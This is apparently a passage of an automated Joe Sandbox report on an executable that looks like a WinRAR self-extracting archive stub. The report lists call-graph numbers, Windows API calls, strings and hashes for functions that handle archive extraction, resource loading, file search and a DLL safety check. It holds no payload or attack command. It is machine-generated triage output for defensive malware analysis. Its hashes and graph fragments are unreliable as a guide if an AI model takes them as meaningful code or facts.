178609 24443->24444 24443->24450 24714 177b66 151 API calls 24443->24714 24444->24450 24715 1884bd 99 API calls 24444->24715 24448->24450 24691 175e3a 24448->24691 24450->24384 24451 178705 24451->24450 24697 17826a 24451->24697 24454 178875 24455 17a4c6 8 API calls 24454->24455 24456 1788e0 24454->24456 24455->24456 24701 177d6c 24456->24701 24458 17c991 80 API calls 24461 17893b _memcmp 24458->24461 24459 178a70 24460 178b43 24459->24460 24467 178abf 24459->24467 24465 178b9e 24460->24465 24475 178b4e 24460->24475 24461->24450 24461->24458 24461->24459 24462 178a69 24461->24462 24716 178236 82 API calls 24461->24716 24717 171f94 74 API calls 24461->24717 24718 171f94 74 API calls 24462->24718 24474 178b30 24465->24474 24721 1780ea 96 API calls 24465->24721 24466 178b9c 24468 179653 79 API calls 24466->24468 24469 17a180 4 API calls 24467->24469 24467->24474 24468->24450 24472 178af7 24469->24472 24471 179653 79 API calls 24471->24450 24472->24474 24719 179377 96 API calls 24472->24719 24473 178c09 24477 179989 GetFileType 24473->24477 24486 178c74 24473->24486 24522 1791c1 __except_handler4 24473->24522 24474->24466 24474->24473 24475->24466 24720 177f26 100 API calls __except_handler4 24475->24720 24476 17aa88 8 API calls 24479 178cc3 24476->24479 24481 178c4c 24477->24481 24482 17aa88 8 API calls 24479->24482 24481->24486 24722 171f94 74 API calls 24481->24722 24500 178cd9 24482->24500 24484 178c62 24723 177061 75 API calls 24484->24723 24486->24476 24487 178d9c 24488 178df7 24487->24488 24489 178efd 24487->24489 24490 178e69 24488->24490 24491 178e07 24488->24491 24493 178f23 24489->24493 24494 178f0f 24489->24494 24510 178e27 24489->24510 24492 17826a CharUpperW 24490->24492 24496 178e4d 24491->24496 24504 178e15 24491->24504 24497 178e84 24492->24497 24495 182c42 75 API calls 24493->24495 24498 1792e6 121 API calls 24494->24498 24499 178f3c 24495->24499 24496->24510 24726 177907 108 API calls 24496->24726 24506 178eb4 24497->24506 24507 178ead 24497->24507 
24497->24510 24498->24510 24729 1828f1 121 API calls 24499->24729 24500->24487 24724 179b21 SetFilePointer GetLastError SetEndOfFile 24500->24724 24725 171f94 74 API calls 24504->24725 24728 179224 94 API calls __EH_prolog 24506->24728 24727 177698 84 API calls __except_handler4 24507->24727 24513 17904b 24510->24513 24730 171f94 74 API calls 24510->24730 24512 179156 24515 17a444 4 API calls 24512->24515 24512->24522 24513->24512 24514 179104 24513->24514 24513->24522 24707 179ebf SetEndOfFile 24513->24707 24708 179d62 24514->24708 24516 1791b1 24515->24516 24516->24522 24731 171f94 74 API calls 24516->24731 24519 17914b 24521 1796d0 75 API calls 24519->24521 24521->24512 24522->24471 24524 171643 24523->24524 24746 17c8ca 24524->24746 24527->24383 24528->24380 24529->24405 24535 1716d2 24530->24535 24532 1770b9 24532->24419 24533->24420 24534->24421 24536 1716e8 24535->24536 24547 171740 __vsnwprintf_l 24535->24547 24537 171711 24536->24537 24548 176e91 74 API calls __vswprintf_c_l 24536->24548 24539 171767 24537->24539 24544 17172d ___std_exception_copy 24537->24544 24541 1935de 22 API calls 24539->24541 24540 171707 24549 176efd 75 API calls 24540->24549 24543 17176e 24541->24543 24543->24547 24551 176efd 75 API calls 24543->24551 24544->24547 24550 176efd 75 API calls 24544->24550 24547->24532 24548->24540 24549->24537 24550->24547 24551->24547 24553 180c56 __vswprintf_c_l 24552->24553 24553->24425 24555 171961 24554->24555 24557 17195d 24554->24557 24558 171896 24555->24558 24557->24427 24559 1718a8 24558->24559 24560 1718e5 24558->24560 24561 173aac 97 API calls 24559->24561 24566 173f18 24560->24566 24564 1718c8 24561->24564 24564->24557 24570 173f21 24566->24570 24567 173aac 97 API calls 24567->24570 24568 171906 24568->24564 24571 171e00 24568->24571 24570->24567 24570->24568 24583 18067c 24570->24583 24572 171e0a __EH_prolog 24571->24572 24591 173b3d 24572->24591 24574 171e34 24575 1716d2 76 API calls 24574->24575 24582 171ebb 24574->24582 24576 171e4b 
24575->24576 24619 171849 76 API calls 24576->24619 24578 171e63 24580 171e6f 24578->24580 24620 18137a MultiByteToWideChar 24578->24620 24621 171849 76 API calls 24580->24621 24582->24564 24584 180683 24583->24584 24585 18069e 24584->24585 24589 176e8c RaiseException Concurrency::cancel_current_task 24584->24589 24587 1806af SetThreadExecutionState 24585->24587 24590 176e8c RaiseException Concurrency::cancel_current_task 24585->24590 24587->24570 24589->24585 24590->24587 24592 173b47 __EH_prolog 24591->24592 24593 173b5d 24592->24593 24594 173b79 24592->24594 24650 176dc1 74 API calls 24593->24650 24596 173dc2 24594->24596 24599 173ba5 24594->24599 24667 176dc1 74 API calls 24596->24667 24598 173b68 24598->24574 24599->24598 24622 182c42 24599->24622 24601 173c26 24602 173cb1 24601->24602 24618 173c1d 24601->24618 24653 17c991 24601->24653 24635 17aa88 24602->24635 24603 173c22 24603->24601 24652 172034 76 API calls 24603->24652 24605 173bf4 24605->24601 24605->24603 24606 173c12 24605->24606 24651 176dc1 74 API calls 24606->24651 24608 173cc4 24612 173d3e 24608->24612 24613 173d48 24608->24613 24639 1792e6 24612->24639 24659 1828f1 121 API calls 24613->24659 24616 173d46 24616->24618 24660 171f94 74 API calls 24616->24660 24661 181acf 24618->24661 24619->24578 24620->24580 24621->24582 24623 182c51 24622->24623 24625 182c5b 24622->24625 24668 176efd 75 API calls 24623->24668 24626 182ca2 ___std_exception_copy 24625->24626 24628 182c9d Concurrency::cancel_current_task 24625->24628 24633 182cfd ___scrt_get_show_window_mode 24625->24633 24627 182da9 Concurrency::cancel_current_task 24626->24627 24629 182cd9 24626->24629 24626->24633 24671 19157a RaiseException 24627->24671 24670 19157a RaiseException 24628->24670 24669 182b7b 75 API calls 3 library calls 24629->24669 24633->24605 24634 182dc1 24636 17aa95 24635->24636 24638 17aa9f 24635->24638 24637 18e24a new 8 API calls 24636->24637 24637->24638 24638->24608 24640 1792f0 __EH_prolog 24639->24640 24672 177dc6 
24640->24672 24643 17709d 76 API calls 24644 179302 24643->24644 24675 17ca6c 24644->24675 24646 17935c 24646->24616 24648 17ca6c 114 API calls 24649 179314 24648->24649 24649->24646 24649->24648 24684 17cc51 97 API calls __vsnwprintf_l 24649->24684 24650->24598 24651->24618 24652->24601 24654 17c9c4 24653->24654 24655 17c9b2 24653->24655 24686 176249 80 API calls 24654->24686 24685 176249 80 API calls 24655->24685 24658 17c9bc 24658->24602 24659->24616 24660->24618 24662 181ad9 24661->24662 24663 181af2 24662->24663 24666 181b06 24662->24666 24687 18075b 84 API calls 24663->24687 24665 181af9 24665->24666 24667->24598 24668->24625 24669->24633 24670->24627 24671->24634 24673 17acf5 GetVersionExW 24672->24673 24674 177dcb 24673->24674 24674->24643 24681 17ca82 __vsnwprintf_l 24675->24681 24676 17cbf7 24677 17cc1f 24676->24677 24678 17ca0b 6 API calls 24676->24678 24679 18067c SetThreadExecutionState RaiseException 24677->24679 24678->24677 24682 17cbee 24679->24682 24680 1884bd 99 API calls 24680->24681 24681->24676 24681->24680 24681->24682 24683 17ab70 89 API calls 24681->24683 24682->24649 24683->24681 24684->24649 24685->24658 24686->24658 24687->24665 24688->24438 24689->24438 24690->24436 24692 175e4a 24691->24692 24732 175d67 24692->24732 24695 175e7d 24696 175eb5 24695->24696 24737 17ad65 CharUpperW CompareStringW 24695->24737 24696->24451 24698 178289 24697->24698 24743 18179d CharUpperW 24698->24743 24700 178333 24700->24454 24702 177d7b 24701->24702 24703 177dbb 24702->24703 24744 177043 74 API calls 24702->24744 24703->24461 24705 177db3 24745 176dc1 74 API calls 24705->24745 24707->24514 24709 179d73 24708->24709 24711 179d82 24708->24711 24710 179d79 FlushFileBuffers 24709->24710 24709->24711 24710->24711 24712 179dfb SetFileTime 24711->24712 24712->24519 24713->24442 24714->24444 24715->24450 24716->24461 24717->24461 24718->24459 24719->24474 24720->24466 24721->24474 24722->24484 24723->24486 24724->24487 24725->24510 24726->24510 24727->24510 
24728->24510 24729->24510 24730->24513 24731->24522 24738 175c64 24732->24738 24734 175d88 24734->24695 24736 175c64 2 API calls 24736->24734 24737->24695 24741 175c6e 24738->24741 24739 175d56 24739->24734 24739->24736 24741->24739 24742 17ad65 CharUpperW CompareStringW 24741->24742 24742->24741 24743->24700 24744->24705 24745->24703 24747 17c8db 24746->24747 24752 17a90e 84 API calls 24747->24752 24749 17c90d 24753 17a90e 84 API calls 24749->24753 24751 17c918 24752->24749 24753->24751 24755 17a5fe 24754->24755 24756 17a691 FindNextFileW 24755->24756 24757 17a621 FindFirstFileW 24755->24757 24758 17a6b0 24756->24758 24759 17a69c GetLastError 24756->24759 24760 17a638 24757->24760 24765 17a675 24757->24765 24758->24765 24759->24758 24761 17b66c 2 API calls 24760->24761 24762 17a64d 24761->24762 24763 17a651 FindFirstFileW 24762->24763 24764 17a66a GetLastError 24762->24764 24763->24764 24763->24765 24764->24765 24765->24391 24766->24225 24767->24231 24768->24231 24769->24234 24770->24241 24772 179ef7 76 API calls 24771->24772 24773 171f5b 24772->24773 24774 171f78 24773->24774 24775 1719a6 97 API calls 24773->24775 24774->24250 24774->24251 24776 171f68 24775->24776 24776->24774 24778 176dc1 74 API calls 24776->24778 24778->24774 24827 18b8e0 93 API calls _swprintf 24828 188ce0 6 API calls 24831 1a16e0 CloseHandle

                  Control-flow Graph

                  APIs
                    • Part of subcall function 001800CF: GetModuleHandleW.KERNEL32(kernel32), ref: 001800E4
                    • Part of subcall function 001800CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001800F6
                    • Part of subcall function 001800CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00180127
                    • Part of subcall function 00189DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00189DAC
                    • Part of subcall function 0018A335: OleInitialize.OLE32(00000000), ref: 0018A34E
                    • Part of subcall function 0018A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0018A385
                    • Part of subcall function 0018A335: SHGetMalloc.SHELL32(001B8430), ref: 0018A38F
                    • Part of subcall function 001813B3: GetCPInfo.KERNEL32(00000000,?), ref: 001813C4
                    • Part of subcall function 001813B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 001813D8
                  • GetCommandLineW.KERNEL32 ref: 0018D61C
                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0018D643
                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0018D654
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0018D68E
                    • Part of subcall function 0018D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0018D29D
                    • Part of subcall function 0018D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0018D2D9
                  • CloseHandle.KERNEL32(00000000), ref: 0018D697
                  • GetModuleFileNameW.KERNEL32(00000000,001CDC90,00000800), ref: 0018D6B2
                  • SetEnvironmentVariableW.KERNEL32(sfxname,001CDC90), ref: 0018D6BE
                  • GetLocalTime.KERNEL32(?), ref: 0018D6C9
                  • _swprintf.LIBCMT ref: 0018D708
                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0018D71A
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0018D721
                  • LoadIconW.USER32(00000000,00000064), ref: 0018D738
                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0018D789
                  • Sleep.KERNEL32(?), ref: 0018D7B7
                  • DeleteObject.GDI32 ref: 0018D7F0
                  • DeleteObject.GDI32(?), ref: 0018D800
                  • CloseHandle.KERNEL32 ref: 0018D843
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                  • API String ID: 788466649-3743209390
                  • Opcode ID: e125db3e5b2488dbb97cddfa13e9a7d2a5c90d3648bb9cc9c6007fee1d11e612
                  • Instruction ID: 72dd82d19c5746b91b34fed4ae1d885e05b2a827372a2bf8161df56807605c5b
                  • Opcode Fuzzy Hash: e125db3e5b2488dbb97cddfa13e9a7d2a5c90d3648bb9cc9c6007fee1d11e612
                  • Instruction Fuzzy Hash: C961C371A04341AFD320BBB5EC4AF6B3BACAB5A740F040529F545925A2DB74DE84CF62

                  Control-flow Graph

                  APIs
                  • FindResourceW.KERNEL32(0018AE4D,PNG,?,?,?,0018AE4D,00000066), ref: 00189E2E
                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0018AE4D,00000066), ref: 00189E46
                  • LoadResource.KERNEL32(00000000,?,?,?,0018AE4D,00000066), ref: 00189E59
                  • LockResource.KERNEL32(00000000,?,?,?,0018AE4D,00000066), ref: 00189E64
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0018AE4D,00000066), ref: 00189E82
                  • GlobalLock.KERNEL32(00000000), ref: 00189E93
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00189EB7
                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00189EFC
                  • GlobalUnlock.KERNEL32(00000000), ref: 00189F1B
                  • GlobalFree.KERNEL32(00000000), ref: 00189F22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                  • String ID: PNG
                  • API String ID: 3656887471-364855578
                  • Opcode ID: 0c2c1889a4c376b1616dd90460d24167eaab57fee579a3c1febef170c04dfabc
                  • Instruction ID: 63373f0c6612bfd3b2fc51353ce6864cd99c8d512c274938ddbedb386ae1af6f
                  • Opcode Fuzzy Hash: 0c2c1889a4c376b1616dd90460d24167eaab57fee579a3c1febef170c04dfabc
                  • Instruction Fuzzy Hash: C2319371204706AFC711AF61DC48A2BBFADFF8A751B080529F916D2660DB31DD40CF60

                  Control-flow Graph

                  control_flow_graph 970 17a5f4-17a61f call 18e360 973 17a691-17a69a FindNextFileW 970->973 974 17a621-17a632 FindFirstFileW 970->974 975 17a6b0-17a6b2 973->975 976 17a69c-17a6aa GetLastError 973->976 977 17a6b8-17a75c call 17fe56 call 17bcfb call 180e19 * 3 974->977 978 17a638-17a64f call 17b66c 974->978 975->977 979 17a761-17a774 975->979 976->975 977->979 985 17a651-17a668 FindFirstFileW 978->985 986 17a66a-17a673 GetLastError 978->986 985->977 985->986 988 17a675-17a678 986->988 989 17a684 986->989 988->989 990 17a67a-17a67d 988->990 991 17a686-17a68c 989->991 990->989 993 17a67f-17a682 990->993 991->979 993->991
                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0017A4EF,000000FF,?,?), ref: 0017A628
                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0017A4EF,000000FF,?,?), ref: 0017A65E
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0017A4EF,000000FF,?,?), ref: 0017A66A
                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0017A4EF,000000FF,?,?), ref: 0017A692
                  • GetLastError.KERNEL32(?,?,?,?,0017A4EF,000000FF,?,?), ref: 0017A69E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FileFind$ErrorFirstLast$Next
                  • String ID:
                  • API String ID: 869497890-0
                  • Opcode ID: 0168267228524d525c934b646927f30ba81a9f3b379e8ab6ee9d0e7f166a358a
                  • Instruction ID: 9eabf85a4ec5a24f74849be6747048813856d2ed2bbf1bae6f4fc45f041e1a9b
                  • Opcode Fuzzy Hash: 0168267228524d525c934b646927f30ba81a9f3b379e8ab6ee9d0e7f166a358a
                  • Instruction Fuzzy Hash: DB418072504645AFC324EF68C884ADFF7F8BF99350F144A2AF5ADD3200D774A9588B92
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,?,00197513,00000000,001ABAD8,0000000C,0019766A,00000000,00000002,00000000), ref: 0019755E
                  • TerminateProcess.KERNEL32(00000000,?,00197513,00000000,001ABAD8,0000000C,0019766A,00000000,00000002,00000000), ref: 00197565
                  • ExitProcess.KERNEL32 ref: 00197577
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 9def08a2b07f36ef7d67eb0d67075a0d6368c97354faba089a1c03da665b1bcb
                  • Instruction ID: 0e598246ed9a054991ed308554b716139883f4e50693c8c064e0c8642f670d31
                  • Opcode Fuzzy Hash: 9def08a2b07f36ef7d67eb0d67075a0d6368c97354faba089a1c03da665b1bcb
                  • Instruction Fuzzy Hash: 47E08C31010908AFDF11AF24DE09B483F29EF12342F018014F8058A672CB35DE83CB80
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID:
                  • API String ID: 3004599000-0
                  • Opcode ID: 03aaf436a3ccc8de5d964ed7b0950c8660e56b44d41f11a5803078e10e4bef5a
                  • Instruction ID: 7eeee98e094e3f148b692d9c991b008183710326fcb6ca4a314541cf92e60120
                  • Opcode Fuzzy Hash: 03aaf436a3ccc8de5d964ed7b0950c8660e56b44d41f11a5803078e10e4bef5a
                  • Instruction Fuzzy Hash: 0C820970944245AEDF25DF64C889BFABBB9AF15300F08C1BAED5D9B142DF315A48CB60
                  APIs
                  • __EH_prolog.LIBCMT ref: 0018AEE5
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prologItemTextWindow
                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                  • API String ID: 810644672-8108337
                  • Opcode ID: 85a86adaf51d95bd37c6b81e4ee39e02bf09538862d0d8dab05e73abeb0f3ca7
                  • Instruction ID: d9431721c654bf1465f2afebc98b3fe3334091d625b67a2d1f341dbac046f898
                  • Opcode Fuzzy Hash: 85a86adaf51d95bd37c6b81e4ee39e02bf09538862d0d8dab05e73abeb0f3ca7
                  • Instruction Fuzzy Hash: 1D42E270949244BFEB21BBB09CCAFBE7B7CAB26700F444159F605A65D2CB744A84CF61

                  Control-flow Graph

                  control_flow_graph 257 1800cf-1800ee call 18e360 GetModuleHandleW 260 1800f0-180107 GetProcAddress 257->260 261 180154-1803b2 257->261 264 180109-18011f 260->264 265 180121-180131 GetProcAddress 260->265 262 1803b8-1803c3 call 1970dd 261->262 263 180484-1804b3 GetModuleFileNameW call 17bc85 call 17fe56 261->263 262->263 273 1803c9-1803fa GetModuleFileNameW CreateFileW 262->273 279 1804b5-1804bf call 17acf5 263->279 264->265 265->261 268 180133-180152 265->268 268->261 276 180478-18047f CloseHandle 273->276 277 1803fc-18040a SetFilePointer 273->277 276->263 277->276 280 18040c-180429 ReadFile 277->280 285 1804cc 279->285 286 1804c1-1804c5 call 180085 279->286 280->276 282 18042b-180450 280->282 284 18046d-180476 call 17fbd8 282->284 284->276 294 180452-18046c call 180085 284->294 289 1804ce-1804d0 285->289 291 1804ca 286->291 292 1804f2-180518 call 17bcfb GetFileAttributesW 289->292 293 1804d2-1804f0 CompareStringW 289->293 291->289 296 18051a-18051e 292->296 301 180522 292->301 293->292 293->296 294->284 296->279 299 180520 296->299 302 180526-180528 299->302 301->302 303 18052a 302->303 304 180560-180562 302->304 305 18052c-180552 call 17bcfb GetFileAttributesW 303->305 306 180568-18057f call 17bccf call 17acf5 304->306 307 18066f-180679 304->307 313 18055c 305->313 314 180554-180558 305->314 317 180581-1805e2 call 180085 * 2 call 17ddd1 call 17400a call 17ddd1 call 189f35 306->317 318 1805e7-18061a call 17400a AllocConsole 306->318 313->304 314->305 316 18055a 314->316 316->304 324 180667-180669 ExitProcess 317->324 323 18061c-180661 GetCurrentProcessId AttachConsole call 1935b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->323 318->324 323->324
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32), ref: 001800E4
                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001800F6
                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00180127
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001803D4
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001803F0
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00180402
                  • ReadFile.KERNEL32(00000000,?,00007FFE,001A3BA4,00000000), ref: 00180421
                  • CloseHandle.KERNEL32(00000000), ref: 00180479
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0018048F
                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 001804E7
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00180510
                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0018054A
                    • Part of subcall function 00180085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001800A0
                    • Part of subcall function 00180085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0017EB86,Crypt32.dll,00000000,0017EC0A,?,?,0017EBEC,?,?,?), ref: 001800C2
                  • _swprintf.LIBCMT ref: 001805BE
                  • _swprintf.LIBCMT ref: 0018060A
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                  • AllocConsole.KERNEL32 ref: 00180612
                  • GetCurrentProcessId.KERNEL32 ref: 0018061C
                  • AttachConsole.KERNEL32(00000000), ref: 00180623
                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00180649
                  • WriteConsoleW.KERNEL32(00000000), ref: 00180650
                  • Sleep.KERNEL32(00002710), ref: 0018065B
                  • FreeConsole.KERNEL32 ref: 00180661
                  • ExitProcess.KERNEL32 ref: 00180669
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                  • API String ID: 1201351596-3298887752
                  • Opcode ID: 1302043e06549deff965aa9db15d580c6494e316058aabf94f936160a7c6d1c3
                  • Instruction ID: ad83f8c898b1d25103ea400b5de56e1e01055777c20044fecd7fc4355c795ecd
                  • Opcode Fuzzy Hash: 1302043e06549deff965aa9db15d580c6494e316058aabf94f936160a7c6d1c3
                  • Instruction Fuzzy Hash: ECD183B5148384ABD331AF50DE49B9FBBE8BF86704F50491DF6A9A6140D7B087488F63

                  Control-flow Graph

